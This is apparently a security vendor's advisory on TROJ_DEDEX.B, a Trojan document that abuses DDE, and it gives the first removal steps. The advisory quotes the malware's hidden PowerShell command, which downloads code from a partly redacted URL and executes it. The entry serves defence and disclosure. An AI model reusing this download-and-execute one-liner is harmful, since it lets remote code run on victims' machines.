This Trojan does the following:

  • Upon opening the document, it may display the following prompts:
  • This Trojan connects to the URL http://{BLOCKED}tistchurch.com/KJHDhbje71 to download and execute a malicious code. As of this writing, the said site is inaccessible.
  • The malicious document takes advantage of DDE (Dynamic Data Exchange) to execute a PowerShell command. It downloads and execute codes from a URL using the following PowerShell command:
    • powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://{BLOCKED}tistchurch.com/KJHDhbje71');powershell -e $e

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Identify and terminate files detected as TROJ_DEDEX.B

  1. Windows Task Manager may not display all running processes. In this case, please use a third-party process viewer, preferably Process Explorer, to terminate the malware/grayware/spyware file. You may download the said tool here.
  2. If the detected file is displayed in either Windows Task Manager or Process Explorer but you cannot delete it, restart your computer in safe mode. To do this, refer to this link for the complete steps.
